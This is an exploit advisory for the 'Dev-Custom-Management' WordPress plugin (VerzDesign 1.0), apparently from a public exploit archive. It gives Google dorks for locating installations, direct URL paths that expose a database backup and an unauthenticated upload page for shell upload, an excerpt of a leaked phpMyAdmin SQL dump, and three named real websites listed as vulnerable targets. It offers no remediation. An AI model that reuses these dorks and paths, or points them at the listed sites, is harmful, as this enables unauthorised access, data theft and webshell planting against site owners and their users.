WordPress Dev-Custom-Management VerzDesign 1.0 Database Disclosure / Shell Upload

`#################################################################################################  
  
# Exploit Title : WordPress Dev-Custom-Management Plugins VerzDesign 1.0  
Database Backup Disclosure and Arbitrary File Upload  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 17/12/2018  
# Vendor Homepage : wordpress.org ~ verzdesign.com  
# Software Download Link : N/A  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 1.0 and 3.0.1  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/plugins/dev-custom-management/''  
+ intext:''A(c) 2012 Optimai All Rights Reserved''  
+ intext:''Web design by Verz''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/dev-custom-management/New%20Text%20Document.txt  
  
/wp-content/plugins/dev-custom-management/New%20Folder/New%20Text%20Document.txt  
  
# Exploit :  
  
/wp-content/plugins/dev-custom-management/filemanager/connectors/uploadtest.html  
  
/wp-content/plugins/dev-custom-management/homeupload/....  
  
/wp-content/plugins/dev-custom-management/subupload/....  
  
/wp-content/plugins/dev-custom-management/certiupload/.....  
  
/wp-content/plugins/dev-custom-management/upload/.....  
  
/wp-content/uploads/[YEAR]/[MONTH/......  
  
#################################################################################################  
  
# Example SQL Dump Information =>  
  
-- phpMyAdmin SQL Dump  
-- version 3.1.3.1  
-- phpmyadmin.net  
--  
-- Host: localhost  
-- Generation Time: Sep 13, 2011 at 04:06 AM  
-- Server version: 5.1.33  
-- PHP Version: 5.2.9  
  
-- Database: `oneome`  
  
-- Table structure for table `oo_ecom_advertisement`  
  
-- Dumping data for table `oo_ecom_advertisement`  
  
-- Table structure for table `oo_ecom_category`  
  
-- Dumping data for table `oo_ecom_category`  
  
-- Table structure for table `oo_ecom_category_feature`  
  
-- Dumping data for table `oo_ecom_category_feature`  
  
-- Table structure for table `oo_ecom_countries`  
  
-- Dumping data for table `oo_ecom_countries`  
  
-- Table structure for table `oo_ecom_feature_value`  
  
-- Dumping data for table `oo_ecom_feature_value`  
  
-- Table structure for table `oo_ecom_product`  
  
-- Dumping data for table `oo_ecom_product`  
  
-- Table structure for table `oo_ecom_product_gallery`  
  
-- Dumping data for table `oo_ecom_product_gallery`  
  
-- Table structure for table `oo_ecom_states`  
  
-- Dumping data for table `oo_ecom_states`  
  
-- Table structure for table `oo_ecom_user`  
  
-- Dumping data for table `oo_ecom_user`  
  
INSERT INTO `oo_ecom_advertisement` (`id`, `advertisement_image`,  
`advertisement_name`,  
`advertisement_price`, `advertisement_link`) VALUES  
(1, '1315680184fca8f44c28.jpg', 'ttest', 11111, '  
https://mail.google.com/mail/?hl=en&tab=wm#inbox');  
  
INSERT INTO `oo_ecom_category` (`id`, `category_name`, `short_description`,  
`cat_image`,  
`parent_id`, `show_in_navigation_menu`, `level`, `date_of_add`) VALUES  
  
INSERT INTO `oo_ecom_category_feature` (`id`, `category_id`,  
`feature_name`) VALUES  
(1, 12, 'Feature 1'),  
(2, 12, 'Feature 2'),  
(3, 12, 'Feature 3');  
  
INSERT INTO `oo_ecom_countries` (`countries_id`, `countries_name`,  
`countries_iso_code_2`,  
`countries_iso_code_3`, `flag`) VALUES  
  
INSERT INTO `oo_ecom_feature_value` (`id`, `product_id`, `feature_id`,  
`feature_value`) VALUES  
(1, 1, 1, 'Feature Val 1'),  
(2, 1, 2, 'Feature Val 2'),  
(3, 1, 3, 'Feature Val 3');  
  
INSERT INTO `oo_ecom_product` (`id`, `category_id`, `product_name`,  
`start_price`, `end_price`,  
`unit_name`, `currency`, `port`,  
`minimum_order_quantity`, `supply_ability`, `payment_terms`,  
`packaging_detail`, `delivery_detail`,  
`specifications`, `add_user_type`, `user_id`) VALUES  
  
INSERT INTO `oo_ecom_product_gallery` (`id`, `product_id`, `product_image`,  
`is_main_image`) VALUES  
(1, 1, '13156295357df20a3a87.jpg', 'N');  
  
INSERT INTO `oo_ecom_states` (`state_id`, `state_name`, `countries_id`)  
VALUES  
(1, 'West Bengal', 99),  
(2, 'Bihar', 99);  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
optimai.com/wp-content/plugins/dev-custom-management/New%20Text%20Document.txt  
  
[+]  
asiagas.com.sg/wp-content/plugins/dev-custom-management/New%20Folder/New%20Text%20Document.txt  
  
[+]  
beaulieuhouse.com.sg/wp-content/plugins/dev-custom-management/filemanager/connectors/uploadtest.html  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`